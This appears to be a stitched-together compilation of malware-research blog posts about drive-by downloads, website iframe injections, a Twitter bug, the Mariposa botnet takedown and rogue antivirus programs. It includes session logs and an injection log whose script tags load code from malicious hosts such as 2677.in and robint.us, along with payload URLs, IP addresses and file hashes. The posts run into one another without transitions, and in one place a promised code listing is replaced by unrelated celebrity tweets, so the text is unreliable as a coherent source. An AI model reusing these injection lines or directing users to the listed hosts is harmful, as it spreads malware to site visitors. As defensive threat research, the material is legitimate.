We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET

hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg

=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12

76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http

%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’7′”

target=”_self”  >    We are all  < /a  >  … < br  /  >  Category: Groups,<

br /  >  Location: USA< script src=hxxp://2677.in/yahoo.js  >  < /script  > < /td  > < /tr  > < tr  > < td colspan=”2″  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >  < tr  >

< td  >

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’6′”

target=”_self”  >    Technosoft < /a  >  … < br  /  >  Category:

Business,< br /  >  Location: India< script src=hxxp://2677.in/yahoo.js  > < /script  >  < /td  > < /tr  > < tr  > < td colspan=”2″ class=”line”  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >

< /table  >

In this latest attack, the tweet messages were coupled with the trending topic items such as Justin Bieber, Oil Spill, and Official Twitter App.   The tweets all contained the text “haha this is the funniest video ive EVER SEEN!” followed by a link to the malware campaign.

In the following image, you can see the results of a search taken shortly after the attack started.  As you can see, the accounts were communicating via the Twitter API, so it’s safe to assume that the cyber criminals behind the attack used some sort of script to make it all happen.

Clicking any of the URLs starts the redirection process to a website where a malicious file is downloaded using the technique known as “drive by download”, which runs this file automatically in the affected computer, without user’s awareness.

The malware site used for the attack is hxxp://pc-tv.tv/stickam/index2.html

In the following image you can see how it seems that a java complement is being loaded, which is necessary to view the video:

However, if we look at the code of this website, you can see how it’s actually calling an EXE file, which belongs to the malware. It has been detected as W32/Lolbot.B.worm.

The code is the following:

Ashton Kutcher: twitter is being hacked by some turkish hacker. haha I have 0 followers.

Justin Bieber: so i woke up here in LA and Twitter has been hacked. Turns out I am no longer popular … hackers i send a warning…u have now pissed off over 2 million teenage girls. They are more dangerous than Navy Seals.

Jim Carrey: Imagine if this hacker put his/her talent 2 some worthy use. They could 1 day have more than a false sense of superiority. They’d #BOING ;^>

Alyssa Milano: Ummmmm….. Where did my followers go @Twitter?

Mark Indelicato: It says that I have 0 followers……

Stephen Collins (7th Heaven): According 2 Twitter they’ve fixed a bug/hack that re-set following/follower #s to 0. Scary. So far, my acct isn’t re-set. Holding breath.

Joe Jonas: Wait.. So this means I have to “talk” to my friends?

The bug was first discovered in a Turkish website, which I have attempted to translate (any of our Turkish viewers willing to submit a better translation?) with Google Translate:

I know that I do not think this bug. twiti accept that start with a code that identifies the code as written should be. twitter is too flat or system that is quite a simple system they write, next to facebook. entered with the data sent by the same function, they showed twiti. After all, if you want to send a data in a way and this is a bug if you send a code to be written against it, by entering a twit you’ve done the easy way ha, ha hard way. When the easy way to write the entire code is perceived as most likely. I would not do so even if I was, anyway.

hide profile sent to people who question the follower They’ll accept bids for your keywords, if you request a follow no action will be taken. so simple.

note: I’m speaking without knowing, I have no programming knowledge about the particles. I like to rant, swh.

It’s still a bit unclear as to who this Turkish Hacker is, although it may be safe to assume that one of the now suspended accounts (@borakrc) in the above Turkish blog is him.  The Twitter staff has acknowledged the bug and has already taken remediation steps to fix the error.

Upon visiting the main PHP-Nuke website (still active), the iframe redirects through a series of exploit attempts, which include Adobe Collab overflow, getIcon, and doc.media.newPlayer vulnerabilities.

malicious iframe redirector – php-nuke

After the initial iframe redirection, the second iframe redirection starts and statistics servers (hosted in Russia) are accessed.

second stage iframe redirection/statistic collection

After the second stage is completed, the third stage starts and the exploitation attempts begin.

3rd stage – obfuscated code – exploitation attempts

If the various exploit attempts are successful, the CI.A Trojan is executed on the victims computer.

Lately, we’ve noticed an uptick in usage of the Eleonore exploit kit and judging from the site variable in the URL (E.g. site=phpnuke.org), we’re guessing that this isn’t the only site they are targeting in this attack.

In May 2009, Defence Intelligence, a private information security firm based in Canada began investigating a suspicious new malware sample that was communicating with Command & Control (C&C) servers located in Spain. “Mariposa,” the Spanish word for butterfly, was given to the botnet by Defence Intelligence researchers after several months of probing. Early suspicion was accurate because further investigation eventually led to the discovery of 13 million newly infected machines communicating with the C&C servers. This rapid growth urgently signaled the need for an international coalition to conduct the research, investigation, and takedown efforts of the largest botnet ever recorded in history.

The result was The Mariposa Working Group, comprised of several experts in the Information Security sector including Defence Intelligence, Panda Security, the Georgia Tech Information Security Center, the FBI and the Spanish Civil Guard.  The focus of the group was to identify and eradicate the botnet, as well as bring the cyber criminals to justice.

During the initial stages of research, the Mariposa Working Group discovered that the Mariposa botnet was masterminded by an amateur-run group of several spirited script kiddies named Días de Pesadilla (DDP), which translates to “Nightmare Days Team.”  Uncovered underground forum communication showed that instead of building a complex self-coded botnet infrastructure, the DDP team leveraged the underground community to buy the tools that they needed to build the 13 million strong botnet. In fact, the botnet operators even leveraged the widely popular Zeus crimeware kit, which is a do-it-yourself tool used by many amateur botnet operators today.

The DDP team also bought malware tools (crypters, packers, kits, etc.) on these forums to sell to other members. dDoS services, Adware/Toolbar installs and Botnet rental (primarily for credential harvesting), were among the favorites and it was through this underground forum that the Mariposa botnet became a financially viable tool for the cyber criminals.

The underground communication also enabled the Mariposa Working Group to identify the botnet leader, who was only known by the handle “Netkairo.” Tracking the operator became very difficult, as he only used anonymous VPN services to connect to the botnet infrastructure. The chances of catching the operator were slim, so a more aggressive approach was taken to cease all activity.  On December 23^rd, 2009, the Mariposa botnet was effectively taken over by rerouting the command and control servers DNS records to a sinkhole. Nearly 13 million infected machines immediately began sending beacon signals back to the sinkhole and it was this time that the Mariposa Working Group identified infections in government computers, universities and more than half of the nation’s Fortune 1000 companies.

In a last ditch effort to regain control of the botnet, Netkairo frantically connected to the botnet infrastructure using his home broadband connection. He was able to temporarily regain control of the botnet and subsequently launch a denial of service attack on Defence Intelligence, nearly taking an entire ISP down in the process. This single action proved to be a fatal mistake and the linchpin in unraveling the entire DDP team. The Mariposa Working Group worked in conjunction with Netkairo’s ISP in identifying the botnet masters’ whereabouts and on February 3^rd, 2010 the Spanish Civil Guard quickly moved to arrest the 31-year-old Spaniard at his home in the Basque region of Spain. The investigation of Netkairo’s personal computer led to the discovery of various types of stolen data including bank account details, credit card numbers, user names and passwords from approximately 800,000 victims, as well as evidence which led to the capture of another two Spanish members of the gang: J.P.R., 30,  a.k.a. “jonyloleante”, and  J.B.R., 25, a.k.a. “ostiator,” who were both arrested on February 24^th, 2010.

Victims of Mariposa include home users, companies, government agencies and universities in more than 190 countries.  Christopher Davis, CEO of Defence Intelligence, illustrates the significance of these infections with this one statement: “It would be easier for me to provide a list of the Fortune 1000 companies that weren’t compromised, rather than the long list of those who were.”

The investigation is still ongoing, but preliminary calculations of the losses through fraud, financial theft, data loss and cleanup costs are estimated to be in the millions of dollars.  Analysis of Netkairo’s hard disks revealed a complex network of suppliers offering a range of services including hacking of servers to be used as control servers, encryption services to make the bots undetectable by antivirus programs, anonymous VPN connections to administer the botnet, etc.  There is also a similarly complex network of clients, prepared to rent part of the botnet, to buy stolen credit cards, or pay for the installation of toolbars. The gang also stole directly from bank accounts, using money mules in the United States and Canada, and laundered money through online poker games.

Cases like Mariposa demonstrate the growing trend of the amateur run botnets. Do-it-yourself kits like ZeuS, SpyEye, Elenore, and many others are widely available on the Internet underground and it’s these tools that allowed the amateurs behind the Mariposa botnet to build a 13 million strong victim pool. Fortunately, as cybercriminal attacks continue to increase in frequency and sophistication, information is gleaned for security vendors to develop new tools and law enforcement agencies to develop new strategies for bringing these criminals to justice.

US Treasury Website – Injected iframe

Upon accessing the US Treasury website (treas.gov, bep.gov, or moneyfactory.gov), the iframe silently redirects victims through statistic servers and exploit packs which will carry the victim onto the second stage of the attack.

US Treasury Website Hack (Session Log)

In my case, the exploit kit figured that Java was the best method of infecting my test machine,  although several exploitation methods (mainly PDF) are used by these kits.    It’s still unclear what the original entry point was into the US Treasury website, and I don’t suspect that the US Government will release detailed report about the compromise, but these threats usually make their way onto websites that have outdated server software, web applications, and/or through web application security vulnerabilities such as SQL injection.

After you are infected, your web browser will start redirecting you to ads and other nasty things, such as Rogueware:

I would like to use this post to remind you all to update your web applications and web servers just as frequently as you would your own computer. Doing so will help prevent your website from being hacked and used to propagate these threats on the Internet.  You, your visitors, and many others browsing the Internet will remain one step closer to a safer browsing experience on the Internet.

I went ahead and put together a little video to show you all how the exploit works:

Note: Originally posted on the PandaLabs blog.

_{The following data is included for informational purposes only. Please do not attempt to view or download files from the website.}

Domain: Total-Defender. com
IP: 94.247.2.41
Country: Latvia
Host: DATORU EXPRESS SERVISS Ltd.
Organization: ZlKon

File: total-defender-setup.exe

Connects to:

0    200    HTTP    94.247.2.41    /ck.php    21
1    200    HTTP    94.247.2.41    /tdd.php?i=1
2    200    HTTP    94.247.2.41    /ck.php
3    301    HTTP    94.247.2.41    /tdp.php?ak=24DIGITHASH
4    200    HTTP    CONNECT    pp-pay.net:443
5    200    HTTP    CONNECT    pp-pay.net:443
6    200    HTTP    CONNECT    pp-pay.net:443
7    200    HTTP    CONNECT    bill-support.com:443

Additional Info:

An interesting thing we noticed is that the Rogue did not attempt to scare us into purchasing it, rather telling us that the computer was secure after the scan.  The Rogue authors are probably doing this to keep a high amount of Rogue installations active for the purposes of data theft or for hire services.

Here is a newer rogue threat we found to be active today.  The files are not available yet.

Whois:

ICANN Registrar:  ONLINENIC, INC.
Created:  2008-09-29
Expires:  2009-09-29
Updated:  2008-11-05
Registrar Status:  ok
Name Server:  NS1.FREEFASTDNS.COM (has 135 domains)
Name Server:  NS2.FREEFASTDNS.COM
Whois Server:  whois.onlinenic.com

Server Data
IP Address:  89.149.255.190
IP Location   – Germany – Netdirekt E.k
Response Code:  200
Domain Status:  Registered And No Website

DomainTools Exclusive
Registrant Search: “Shestakov Yuriy” owns about 4,332 other domains

Terse Summary:

GET hxxp://adserver.eosads.com/redirect3/traf.php?id=454 200 OK
GET hxxp://adserver.eosads.com/redirect3/scr.php?a=754739&lang=en-us&id=454&ref=http://spyware-protector.com/  200 OK
GET hxxp://spyware-protector.com/in.php  404 Not Found
GET hxxp://spyware-protector.com/install.php 200 OK
GET hxxp://spyware-protector.com/favicon.ico 404 Not Found

In our previous post regarding a related incident where Motigo served Antivirus 2009 rogue pop-up ads we told website Owners to  make sure they fully understand the all of the risks involved in implementing third party tools, ads, or services.

It’s obvious that the ad companies are not doing a good enough job at making sure their links are safe.  For this very reason, you do not see Google Adsense or similar types of advertisements on Malware Database. It would result in our viewers being infected and that is something we cannot have.  MalwareBytes and Panda Security are two companies that we stand by and those are the only type of ads you will see here, ads that we can guarantee not to lead to infections.

Download.com does have an initiative for malware free downloads but they state nothing about making sure their text based and image advertisements are malware free.  We are hoping the people at Download.com read this and take a stand against current and future threats promoted through their sponsored ads!

Rogue sponsored link served via download.com

Points to the Antispyware 2008 Rogue

*Do not attempt to visit this site or download the software*

What it looks like

File: setupxv.exe
VirusTotal: Result: 12/36 (33.33%)
File size: 5620057 bytes
MD5…: 15134735aff21a9162bef607684b9ca4
SHA1..: 72eff32a2187c339115e6842f80f6aa2273c48be
SHA256: f438f8c9b9f04fb4ee4fbbd2b215abbffb863c99e4a7f28012b0b45c8fe628ed
SHA512: f1e6b742c32c2931697d3ac9c06010d91bb4014d87d5d3a7ac8b6f667e5a08d0
f52ab7bb7864d87ad1ee7d9e1f664713b2c59f529869719294f0b380d27f4e44
PEiD..: Armadillo v1.71
TrID..: File type identification
Win32 Executable MS Visual C++ (generic) (75.0%)
Win32 Executable Generic (16.9%)
Generic Win/DOS Executable (3.9%)
DOS Executable Generic (3.9%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0×412c8f
timedatestamp…..: 0×4466b13c (Sun May 14 04:25:32 2006)
machinetype…….: 0×14c (I386)

Removal Information:Need assistance removing this malware?
Click here for more information about malware removal.
Don’t forget to ask for help in our user forums!